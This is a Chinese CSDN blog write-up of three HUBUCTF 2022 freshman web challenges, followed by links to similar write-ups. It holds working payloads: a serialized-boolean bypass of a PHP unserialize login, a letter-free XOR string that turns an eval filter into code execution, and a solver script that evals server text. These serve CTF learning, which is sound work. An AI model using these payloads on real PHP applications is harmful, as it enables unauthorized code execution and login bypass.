[HUBUCTF 2022 新生赛]

最新推荐文章于 2024-07-03 21:28:21 发布
最新推荐文章于 2024-07-03 21:28:21 发布
阅读量3.1k 收藏 4
点赞数 1
分类专栏: ctf 文章标签: java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhhhb1005/article/details/127035837
版权

checkin

<?php
show_source(__FILE__);
$username  = "this_is_secret"; 
$password  = "this_is_not_known_to_you"; 
include("flag.php");//here I changed those two 
$info = isset($_GET['info'])? $_GET['info']: "" ;
$data_unserialize = unserialize($info);
if ($data_unserialize['username']==$username&&$data_unserialize['password']==$password){
    echo $flag;
}else{
    echo "username or password error!";

}

        先对代码进行审计,发现isset( )是我们没见过的用法,可以去了解一下。

isset() 函数用于检测变量是否已设置并且非 NULL。

以上是基本用途,而本题中用到的是php的三元运算符

$id = isset($_GET['id']) ? $_GET['id'] : '';

(条件) ? (值1):(值2);

解释:如果条件成立(为真),则执行冒号前边的“值1”,否则执行冒号后面的“值2”。

isset()函数是检测变量是否设置,$_GET['id']是通过get方法传过来的值。
这句话的意思就是:如果$_GET['id']已经被设置,即已经有值了,则$id=$_GET['id'];
如果$_GET['id']没有被设置,则$id = '';

        继续向下看,发现unserialize 就可以知道和反序列化有关了。

exp:

<?php
$info = array(
	'username'=>true,
	'password'=>true
);
$serialized_data = serialize($info);
echo  $serialized_data . PHP_EOL;
?>

        得到payload

?info=a:2:{s:8:"username";b:1;s:8:"password";b:1;}

        这里卡在exp怎么写,后来详细了解了一下序列化和反序列化以后,再结合上面的isset( ),知道了username和password要用boolen类型,才写了出来。

HowToGetShell

<?php
show_source(__FILE__);
$mess=$_POST['mess'];
if(preg_match("/[a-zA-Z]/",$mess)){
    die("invalid input!");
}
eval($mess);

        这道题一眼可以看到preg_match( )函数 ,对于/a-zA-Z/这个正则表达式,我们可以利用PHP动态函数的特性,构造出字符串。

valid = "1234567890!@$%^*(){}[];\'\",.<>/?-=_`~ "
 
 
answer = "phpinfo"
 
 
tmp1,tmp2 = '',''
for c in answer:
    for i in valid:
        for j in valid:
            if (ord(i)^ord(j) == ord(c)):
                tmp1 += i
                tmp2 += j
                break
        else:
            continue
        break
print(tmp1,tmp2)

payload

mess=$_="0302181"^"@[@[_^^";$_();

参考链接

Calculate

题目是想让我们做数学题,而且要速度介于1-3s之间,回答20个问题即可给出flag。但是我对这道题目无从下手,exp也不会写就去找了大佬的

 

# -*- coding: utf-8 -*-
import time
import requests
import re

url = 'http://1.14.71.254:28110/'
ses = requests.session()
reg = re.compile(">(.)</div")
while True:
    get = ses.get(url)
    math = reg.findall(get.text)
    final = ''.join(math)[:-1]
    result = str(eval(final))
    print(result)
    time.sleep(1)
    post = ses.post(url=url, data={"ans": result})
    if 'NSS' in post.text:
        print(post.text)
        break
    time.sleep(1)

最后也是得到了flag。

S@Kura
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
NSSCTF-HUBUCTF新生-wp
F1rstb100d
09-21 1235
NSSCTF-HUBUCTF新生-wp
刷题笔记[HUBUCTF 2022 新生]web
hcja666的博客
02-19 2052
开学后可能就不怎么刷题了,因为课巨多😅,可能分享其他东西,虽然寒假也没做多少。不管了反正以后不走ctf这条路。
HUBUCTF 2022 新生-WEB部分wp
m0_74606212的博客
10-09 377
HUBUCTF 2022 新生-WEB部分wp
[HUBUCTF 2022 新生]RSAaaa
2302_80322812的博客
05-31 143
【代码】[HUBUCTF 2022 新生]RSAaaa。
[HUBUCTF 2022 新生]help
atm7758258的博客
10-27 189
[HUBUCTF 2022 新生]help,走迷宫题目,通过IDA动态调试拿到map+BFS广度优先搜索获得最短路径后,md5加密拿到flag
[HUBUCTF 2022 新生]checkin
2302_81393479的博客
02-26 336
看代码可以得到include("flag.php")处的提示是已经修改了username和password这两个值。题目条件是叫我们传info这个变量,并且info这个变量反序列化后变成data_unserialize,然后要满足if($data_unserialize['username']==$username&&$data_unserialize['password']==$password)但是我们无从得知username和password两个变量。但细看条件就可以发现里面是弱比较(==)。
NSS [HUBUCTF 2022 新生]checkin
Jay17的博客
11-10 658
NSS [HUBUCTF 2022 新生]checkin
nssctf-[HUBUCTF 2022 新生]fmt
最新发布
m0_73818758的博客
07-03 226
如果文件成功打开,返回一个指向文件的指针 stream,否则返回 NULL。在成功打开文件后,从文件中读取最多50个字符(包括换行符和终止符)到 s 数组中。fgets 函数会读取一行内容,直到达到指定的字符数(包括终止符)或遇到换行符或文件结束标志。如图,rbp的地址已知,反向推出s的位置,即可得到s相对于格式化字符串的偏移%12$p。此时即可编写exp,注意程序是小端序,得到16进制编码的flag后进行还原。没在CSND上看到这题的wp,整理一下思路。依次处理其他字符串,最终输出完整的flag。
NSSCTF靶场练习[HUBUCTF 2022 新生]
Sciurdae的博客
12-16 636
签到题一个base64编码,自定义了码表、
NSS [HUBUCTF 2022 新生]Calculate
Jay17的博客
12-05 279
NSS [HUBUCTF 2022 新生]Calculate
[HUBUCTF 2022 新生]ezsql
liaochonxiang的博客
05-15 295
发现密文以md5(password)形式存储在数据库中。users要换成十六进制0x7573657273。思路:更新资料的时候可以同时更新所有密码。我们需要知道密码的字段名。爆password字段。
[HUBUCTF 2022 新生]HowToGetShell题解
qq_64222098的博客
08-08 652
老早以前遇到过无字母rce,但是现在忘记得差不多了。现在以这道题来回温一下rce的解决方法。这道题只过滤了字母,算是一道简单的rce了。
[HUBUCTF 2022 新生]simple_RE
weixin_61154173的博客
10-25 1127
re简单题(base64)
2022新生wp
kindyyy的博客
03-10 438
先把我会整的整一下(bushi..) 1、手机短信 之前也这样编过短信发过给别人(doge),多少还是试了一下. 用九键的话,看键盘就可以发现,33表示的是第三个键的第三个字符,以此类推 Flag{aluckyday} 好了就行了。 2、银河字母 先看题目 的确是没有见过的密码,用百度搜一搜,找到了密码的对照表 flag{VWXYZ} (记得一定要大写才行!!!) 3、会翻墙的修勾 先用那个压缩包爆破出密码:13579 然后打开后发现有点东西(不是),给了..
BUUCTF WEB Ezsqli
qq_41696858的博客
04-01 5487
继续刷题,comment之前在攻防世界刷过了,就不刷了。从题目上我们就知道这一题是个sql注入题 打开场景,我们发现依旧的儒雅随和 一个查询框,那么就是要硬搞了呗 经查询1,2是两条有效数字,0和其他的都是非法输入 1+1成功回显2,下面就是过滤字判断 既然是布尔型的回显,先试试0^1,嗯,异或符给我们留下了 布尔类型查用的substr,ascii先试试 0^(ascii(substr(‘hello’,1,1))>1) 1^(ascii(substr(‘hello’,1,1))>1) 成功回显,
【pwn】[HUBUCTF 2022 新生]ez_pwn --随机数
question55的博客
11-12 94
查一下程序保护状态保护全开,看一下代码逻辑逻辑比较简单,就是输入一个用户名,然后进行随机数运算,这里可以使用ctypes模块,形成和服务器那边一模一样的随机数from pwn import *import ctypescontext(os='linux',arch='amd64',log_level='debug')io=remote("node5.anna.nssctf.cn",28750)libc=ctypes.CDLL("libc.so.6")io.recvuntil(b"there?\n")io.s
2022UUCTF-web
bossDDYY的博客
11-03 1925
我们先输入手机号和验证码试试,发现无论请求多少次 hint永远是895547922,结合mt_srand和mt_rand函数 当设置的种子确定(此处的种子时输入的手机号)时,每次的mt_rand都是固定的 我们可以猜测hint就是mt_rand的第一次,而目的验证码就是mt_rand的第二次。而且我们笃定是有上传的网页的,限制了文件类型 我们想要上传的是so,但是LD_PRELOAD也能解析jpg后缀 所以修改后缀上传就可以。sub的值是当前时间的最后一位,也就是保证当前的时间为xxxxxxxx1即可。
[HUBUCTF 2022 新生]ezPython
qq_61156124的博客
04-13 933
bytes_to_long():将字符串变为一串数。逆:long_to_bytes()(将一串数字变为字符串)原理:长度为n的字节串,从最低位向最高位每挪动一位,乘数倍增2^8,因为一个字节是8位bits。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值